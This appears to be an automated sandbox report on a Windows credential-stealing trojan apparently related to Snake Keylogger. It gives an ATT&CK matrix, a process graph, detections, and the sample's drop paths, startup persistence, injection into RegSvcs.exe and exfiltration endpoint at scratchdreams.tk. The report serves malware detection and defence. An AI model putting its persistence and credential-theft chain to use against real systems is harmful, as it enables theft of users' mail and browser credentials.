              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts
              2
              Valid Accounts
              3
              Obfuscated Files or Information
              Security Account Manager3
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron2
              Registry Run Keys / Startup Folder
              21
              Access Token Manipulation
              1
              DLL Side-Loading
              NTDS27
              System Information Discovery
              Distributed Component Object Model21
              Input Capture
              13
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
              Process Injection
              1
              Masquerading
              LSA Secrets131
              Security Software Discovery
              SSH3
              Clipboard Data
              Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
              Registry Run Keys / Startup Folder
              2
              Valid Accounts
              Cached Domain Credentials111
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
              Virtualization/Sandbox Evasion
              DCSync2
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1422242 Sample: PsBygexGwH.exe Startdate: 08/04/2024 Architecture: WINDOWS Score: 100 32 checkip.dyndns.org 2->32 34 scratchdreams.tk 2->34 36 2 other IPs or domains 2->36 44 Multi AV Scanner detection for domain / URL 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 8 other signatures 2->50 8 PsBygexGwH.exe 6 2->8         started        12 wscript.exe 1 2->12         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\name.exe, PE32 8->26 dropped 28 C:\Users\user\AppData\Local\Temp\troopwise, MIPSEB 8->28 dropped 56 Binary is likely a compiled AutoIt script file 8->56 58 Found API chain indicative of sandbox detection 8->58 14 name.exe 3 8->14         started        60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->60 18 name.exe 2 12->18         started        signatures6 process7 file8 30 C:\Users\user\AppData\Roaming\...\name.vbs, data 14->30 dropped 62 Binary is likely a compiled AutoIt script file 14->62 64 Machine Learning detection for dropped file 14->64 66 Drops VBS files to the startup folder 14->66 72 2 other signatures 14->72 20 RegSvcs.exe 15 2 14->20         started        68 Writes to foreign memory regions 18->68 70 Maps a DLL or memory area into another process 18->70 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 38 checkip.dyndns.com 158.101.44.242, 49737, 49740, 49742 ORACLE-BMC-31898US United States 20->38 40 scratchdreams.tk 104.21.27.85, 443, 49752, 49768 CLOUDFLARENETUS United States 20->40 42 reallyfreegeoip.org 172.67.177.134, 443, 49738, 49739 CLOUDFLARENETUS United States 20->42 52 Tries to steal Mail credentials (via file / registry access) 24->52 54 Tries to harvest and steal browser information (history, passwords, etc) 24->54 signatures12

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              PsBygexGwH.exe66%ReversingLabsWin32.Trojan.Strab
              PsBygexGwH.exe70%VirustotalBrowse
              PsBygexGwH.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\directory\name.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\troopwise0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\troopwise0%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              reallyfreegeoip.org1%VirustotalBrowse
              scratchdreams.tk6%VirustotalBrowse
              checkip.dyndns.com0%VirustotalBrowse
              checkip.dyndns.org0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://checkip.dyndns.org/0%URL Reputationsafe
              http://checkip.dyndns.org/q0%URL Reputationsafe
              http://checkip.dyndns.org/q0%URL Reputationsafe
              http://reallyfreegeoip.org0%URL Reputationsafe
              https://reallyfreegeoip.org0%URL Reputationsafe
              http://checkip.dyndns.org0%URL Reputationsafe
              http://checkip.dyndns.com0%URL Reputationsafe
              http://checkip.dyndns.com0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/0%URL Reputationsafe
              https://scratchdreams.tk100%Avira URL Cloudmalware
              https://reallyfreegeoip.org/xml/102.129.152.231$0%Avira URL Cloudsafe
              https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
              http://scratchdreams.tk100%Avira URL Cloudmalware
              http://checkip.dyndns.com(0%Avira URL Cloudsafe
              https://reallyfreegeoip.org/xml/102.129.152.2310%Avira URL Cloudsafe
              https://scratchdreams.tk15%VirustotalBrowse
              http://scratchdreams.tk6%VirustotalBrowse
              https://scratchdreams.tk/_send_.php?TS14%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              172.67.177.134
              truefalseunknown
              scratchdreams.tk
              104.21.27.85
              truefalseunknown
              checkip.dyndns.com
              158.101.44.242
              truefalseunknown
              checkip.dyndns.org
              unknown
              unknowntrueunknown
              NameMaliciousAntivirus DetectionReputation
              http://checkip.dyndns.org/false
              • URL Reputation: safe
              unknown
              https://scratchdreams.tk/_send_.php?TSfalse
              • 14%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              https://reallyfreegeoip.org/xml/102.129.152.231false
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://checkip.dyndns.com(RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              http://checkip.dyndns.org/qname.exe, 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://scratchdreams.tkname.exe, 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000270E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, name.exe, 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
              • 15%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002620000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://checkip.dyndns.orgRegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000025FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002985000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://checkip.dyndns.comRegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://reallyfreegeoip.org/xml/102.129.152.231$RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://scratchdreams.tkRegSvcs.exe, 00000007.00000002.4088699250.000000000270E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029C1000.00000004.00000800.00020000.00000000.sdmpfalse
                • 6%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                https://reallyfreegeoip.org/xml/name.exe, 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                158.101.44.242
                checkip.dyndns.comUnited States
                31898ORACLE-BMC-31898USfalse
                172.67.177.134
                reallyfreegeoip.orgUnited States
                13335CLOUDFLARENETUSfalse
                104.21.27.85
                scratchdreams.tkUnited States
                13335CLOUDFLARENETUSfalse
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1422242
                Start date and time:2024-04-08 13:56:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 10m 21s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:PsBygexGwH.exe
                renamed because original name is a hash value
                Original Sample Name:f36cebf205cb95b23bea11f15356461b51b40cd0bd586e5c5f151a6396a6151a.exe
                Detection:MAL
                Classification:mal100.troj.spyw.expl.evad.winEXE@10/10@3/3
                EGA Information:
                • Successful, ratio: 80%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 56
                • Number of non-executed functions: 300
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240s for sample files taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target RegSvcs.exe, PID 3844 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                TimeTypeDescription
                12:59:12AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                13:59:15API Interceptor1420662x Sleep call for process: RegSvcs.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                158.101.44.242SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                • checkip.dyndns.org/
                Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                • checkip.dyndns.org/
                lxdriver_setup.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                • checkip.dyndns.org/
                Hitomi Downloader.exeGet hashmaliciousAgent Tesla, AgentTesla, RisePro StealerBrowse
                • checkip.dyndns.org/
                e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                • checkip.dyndns.org/
                Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                • checkip.dyndns.org/
                ATM Dekont E-Maili pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                • checkip.dyndns.org/
                Halkbank_Ekstre_20240312_081829_752731.exeGet hashmaliciousSnake KeyloggerBrowse
                • checkip.dyndns.org/
                Contract.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                • checkip.dyndns.org/
                Q88 09284823910.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                • checkip.dyndns.org/
                172.67.177.134Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                  Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                    Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                      Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                        109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                          FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                            z52OURO08765.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                              PT98765445670009.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                8wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                  SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                                    104.21.27.85Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                      Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                          Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                            Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                              Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    PT98765445670009.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      8wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        checkip.dyndns.com58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.130.0
                                                        Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        VI3 Operation Guide_tech Info versionfdp.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                        • 132.226.8.169
                                                        Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 132.226.247.73
                                                        SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                        • 158.101.44.242
                                                        request-2.doc.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                        • 132.226.8.169
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 132.226.8.169
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 158.101.44.242
                                                        Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                        • 132.226.247.73
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 132.226.247.73
                                                        scratchdreams.tk58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.169.18
                                                        Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.27.85
                                                        Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.27.85
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.27.85
                                                        Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                        • 104.21.27.85
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.27.85
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.27.85
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.169.18
                                                        109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.27.85
                                                        1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                        • 172.67.169.18
                                                        reallyfreegeoip.org58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.67.152
                                                        Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.67.152
                                                        Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                        • 104.21.67.152
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.67.152
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.67.152
                                                        109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ORACLE-BMC-31898US58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.130.0
                                                        acZPG2kRsL.elfGet hashmaliciousMiraiBrowse
                                                        • 132.145.48.205
                                                        kIUmnxfdLQ.elfGet hashmaliciousMiraiBrowse
                                                        • 193.123.7.164
                                                        Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        https://letg.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2FpasswordGet hashmaliciousHTMLPhisherBrowse
                                                        • 150.136.26.45
                                                        SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                        • 158.101.44.242
                                                        https://objectstorage.sa-saopaulo-1.oraclecloud.com/n/grnf1myuo7lg/b/bucket-20240402-0423/o/indexsmoke.htmlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                        • 134.70.84.3
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 158.101.44.242
                                                        mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                        • 150.136.132.149
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.130.0
                                                        CLOUDFLARENETUS7mIgg1hm7Q.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 104.26.5.15
                                                        Gh9nbkn2Q6.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205
                                                        4N8BNeFRkZ.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205
                                                        https://www.canva.com/design/DAFgnbl60Ls/hLJisMAwxDjPFHzhh8Zhhw/view?utm_content=DAFgnbl60Ls&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelinkGet hashmaliciousUnknownBrowse
                                                        • 104.16.103.112
                                                        glU9DsYtYY.exeGet hashmaliciousDridex Dropper, RisePro StealerBrowse
                                                        • 104.26.5.15
                                                        http://midjourney.coGet hashmaliciousUnknownBrowse
                                                        • 104.17.2.184
                                                        58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.169.18
                                                        DHL 986022_pdf.vbsGet hashmaliciousFormBookBrowse
                                                        • 172.67.215.45
                                                        EUR 17252,8 20240403.vbsGet hashmaliciousRemcosBrowse
                                                        • 172.67.215.45
                                                        UPS 984645.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        CLOUDFLARENETUS7mIgg1hm7Q.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 104.26.5.15
                                                        Gh9nbkn2Q6.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205
                                                        4N8BNeFRkZ.exeGet hashmaliciousAgentTeslaBrowse
